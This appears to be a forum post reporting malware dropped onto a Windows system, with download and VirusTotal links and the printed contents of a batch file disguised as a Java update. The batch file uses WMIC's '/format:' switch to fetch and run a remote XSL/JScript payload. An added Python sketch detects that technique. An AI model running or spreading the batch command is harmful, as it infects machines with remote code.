Found these files that were silently dropped onto my system by an attacker.
Download:
https://www.uploadadz.com/gwhnvyaj4mus
Download 2:
https://dropbbase.com/download/6420204a2...63dc9.html
Virus Scan:
https://www.virustotal.com/#/file/c3d0c5.../detection
initializer.xsl (11/56)
https://www.virustotal.com/#/file/72d4e9.../detection
By reading the virus report it can easily be checked that the xsl launches Powershell.exe
JavaUpdate-242799.bat
Code:
@echo off
%SystemRoot%\system32\cmd.exe /k start /MIN %SystemRoot%\system32\wbem\WMIC.exe os get /format:"http://EGPHVcRtPL.blessedsite.com/10/initializer.xsl?QDUzTUH25w8ZVTs2FGPFpwhWjhZav8" && exit
By reading the code it can easily be checked that the WMI Commandline Utility gets the initializer.xsl file.
The xsl file is in XML/JScript language.
Malicious site last checked: 20:33 08/01/2019
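Added example, not part of the original post: a detection sketch that classifies logged process command lines and flags WMIC invocations whose /format: switch points at a stylesheet on another host, as the batch file above does. The function names, verdict labels and sample lines are assumptions made for this example; host names are placeholders.

```python
import re

# wmic or wmic.exe as a program name, bare or at the end of a path
WMIC_RE = re.compile(r'(?:^|[\\/\s"])wmic(?:\.exe)?(?=["\s]|$)', re.IGNORECASE)
# Value of the /format: switch, quoted or bare
FORMAT_RE = re.compile(r'/format:\s*(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# http(s) URL or UNC path: this example treats both as "another host"
REMOTE_RE = re.compile(r'^(?:https?://|\\\\)', re.IGNORECASE)


def classify(cmdline):
    """Return (verdict, format_value) for one logged command line."""
    # Simplification: drop every caret, since cmd.exe removes unquoted ones
    flat = cmdline.replace("^", "")
    if not WMIC_RE.search(flat):
        return ("not_wmic", None)
    m = FORMAT_RE.search(flat)
    if m is None:
        return ("wmic_no_format", None)
    value = m.group(1) if m.group(1) is not None else m.group(2)
    if REMOTE_RE.match(value):
        return ("remote_stylesheet", value)
    if value.lower().endswith(".xsl"):
        return ("local_stylesheet", value)
    return ("named_format", value)


def scan(lines):
    """Return (command line, stylesheet) pairs that load a remote stylesheet."""
    return [(l, classify(l)[1]) for l in lines
            if classify(l)[0] == "remote_stylesheet"]


# Constructed sample command lines (host names are placeholders)
SAMPLES = [
    r'%SystemRoot%\system32\cmd.exe /k start /MIN %SystemRoot%\system32\wbem\WMIC.exe '
    r'os get /format:"http://stylesheet.example.invalid/10/initializer.xsl?x" && exit',
    r'w^mic o^s get /for^mat:"https://stylesheet.example.invalid/a.xsl"',
    r'wmic os get /format:"\\fileserver.example.invalid\share\style.xsl"',
    r'wmic os get /format:C:\Temp\report.xsl',
    r'wmic os get /format:list',
    r'WMIC.exe process list brief',
    r'notepad.exe C:\notes\wmic-format.txt',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line)[0].ljust(18), line)
```

Routine administrative use of WMIC with named formats such as list or csv falls into the named_format verdict, so only the remote_stylesheet results need triage.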